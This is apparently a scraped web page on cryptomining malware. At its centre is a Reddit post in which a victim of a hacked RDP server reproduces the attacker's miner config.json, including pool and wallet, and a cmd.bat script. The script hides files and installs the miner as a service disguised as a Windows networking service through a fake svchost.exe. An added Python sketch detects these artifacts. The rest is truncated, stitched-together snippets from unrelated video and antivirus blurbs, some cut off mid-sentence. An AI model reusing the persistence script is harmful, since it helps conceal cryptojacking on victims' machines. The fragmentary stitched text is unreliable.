Bitcoin Miner Virus - How to detect and remove it ...

MoneroOcean pool owner supports botnets

Hi guys,
As of late my vps that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
By further investigation I found that this miner uses config.json as its configuration file and I'm posting the contents also publicly here:
    {
      "algo": "cryptonight",
      "api": {
        "port": 0,
        "access-token": null,
        "id": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
      },
      "asm": true,
      "autosave": true,
      "av": 0,
      "background": false,
      "colors": true,
      "cpu-affinity": null,
      "cpu-priority": null,
      "donate-level": 0,
      "huge-pages": true,
      "hw-aes": null,
      "log-file": null,
      "max-cpu-usage": 100,
      "pools": [
        {
          "url": "gulf.moneroocean.stream:80",
          "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq",
          "pass": "x",
          "rig-id": null,
          "nicehash": false,
          "keepalive": false,
          "variant": -1,
          "enabled": true,
          "tls": false,
          "tls-fingerprint": null
        }
      ],
      "print-time": 60,
      "retries": 5,
      "retry-pause": 5,
      "safe": false,
      "threads": [
        { "low_power_mode": 1, "affine_to_cpu": false, "asm": true },
        { "low_power_mode": 1, "affine_to_cpu": false, "asm": true },
        { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }
      ],
      "user-agent": null,
      "watch": true
    }
cmd.bat contents are the following:
    attrib -a -s -r -h C:\WINDOWS\Debug\nat*
    net stop Networks
    taskkill /f /im system.exe
    C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe
    sc config "Networks20181019" DisplayName= "Networksr20181019"
    sc description "Networks20181019" "Microsoft Windows Networks"
    Set ProcessName=system.exe
    sc start "Networks20181019"
    attrib +a +s +r +h C:\WINDOWS\Debug\nat*
    echo u/off
    del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. He doesn't want to ban the miner, shortly.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IPs publicly.
What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address as well.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero
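
A triage sketch for the two artifacts quoted in the post above, added here as an example and not part of the original post or any tool it mentions. It flags JSON with the miner config's key set, and batch lines that install a service through a wrapper named svchost.exe outside the system directories or set hidden and system attributes. The sample inputs are constructed from the post, with the wallet replaced by a placeholder.

```python
import json
import ntpath
import re

MINER_KEYS = {"algo", "pools", "donate-level", "max-cpu-usage", "threads"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# <wrapper>.exe install "<service name>" <target>.exe, as in the post's cmd.bat
INSTALL = re.compile(r'^(\S+\.exe)\s+install\s+"([^"]+)"\s+(\S+\.exe)$', re.I)

def triage_config(text):
    """Return pool findings for JSON that carries the miner config's key set."""
    try:
        cfg = json.loads(text)
    except ValueError:
        return []
    if not isinstance(cfg, dict) or len(MINER_KEYS & set(cfg)) < 3:
        return []
    pools = [p for p in cfg.get("pools") or [] if isinstance(p, dict)]
    return [("pool", p.get("url"), "tls" if p.get("tls") else "plaintext")
            for p in pools]

def triage_batch(text):
    """Return findings for service persistence and file hiding in a batch script."""
    findings = []
    for line in (raw.strip() for raw in text.splitlines()):
        tokens = line.split()
        m = INSTALL.match(line)
        if m:
            wrapper, service, target = m.groups()
            findings.append(("service-install", service, target))
            # A binary named svchost.exe outside the system directories is masquerading.
            if (ntpath.basename(wrapper).lower() == "svchost.exe"
                    and ntpath.dirname(wrapper).lower() not in SYSTEM_DIRS):
                findings.append(("masquerade", wrapper))
        elif tokens and tokens[0].lower() == "attrib":
            flags = {t.lower() for t in tokens[1:] if t[0] in "+-"}
            if {"+h", "+s"} <= flags:
                findings.append(("hidden-system", tokens[-1]))
    return findings

# Constructed samples based on the post; the wallet is a placeholder.
SAMPLE_CONFIG = ('{"algo": "cryptonight", "donate-level": 0, "max-cpu-usage": 100, '
                 '"pools": [{"url": "gulf.moneroocean.stream:80", '
                 '"user": "WALLET_PLACEHOLDER", "tls": false}]}')
SAMPLE_BATCH = r'''attrib -a -s -r -h C:\WINDOWS\Debug\nat*
C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe
sc start "Networks20181019"
attrib +a +s +r +h C:\WINDOWS\Debug\nat*'''

if __name__ == "__main__":
    print(triage_config(SAMPLE_CONFIG))
    print(triage_batch(SAMPLE_BATCH))
```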


Riskware.Miner

Symptoms of a Trojan.BitCoinMiner Infection

As Trojan.BitCoinMiners do not display a window and silently run in the background, many people do not even know that they are infected.

Crypto-miner malware infects your PC or other devices like an ordinary virus, but then starts using your device to compute a digital currency. For Bitcoins, for example, ...

The virus's malicious activity consists of running multiple malicious scripts on the infected PC through a backdoor that the Bitcoin Miner virus runs beforehand. These scripts are intended to connect the virus to a command-and-control server. If the mining virus uses different classes to run more scripts that allow various actions to be carried out:

BitCoin miner virus or BitCoin mining virus is a dangerous malware that may use your CPU and/or GPU to obtain BitCoin cryptocurrency by mining illegally. Cryptocurrency miners keep hitting computers and trying to use their resources to generate revenue for their developers. Even though this type of infection is called BitCoinMiner, it does mine for digital currencies such as Monero ...


BEWARE THE BITCOIN VIRUS! (Bitcoin Trojan Provention)

For more information: https://www.bitcoinmining.com and https://www.weusecoins.com What is Bitcoin Mining? Have you ever wondered how Bitcoin is generated? T...

This video is simply some unedited footage that I was preparing to show how malware that masquerades as a Realtek Audio Driver sits and uses system resources to mine Bitcoin for the malware author.

BitcoinMiner is a Malware that was designed to force your computer to mine crypto-currency that is called Bitcoin. When the Bitcoins have been mined on the computer’s system, the designer of this...

How to manually remove these little performance ruining bastards. These things are becoming the new epidemic. Most anti viruses don't detect them because the...
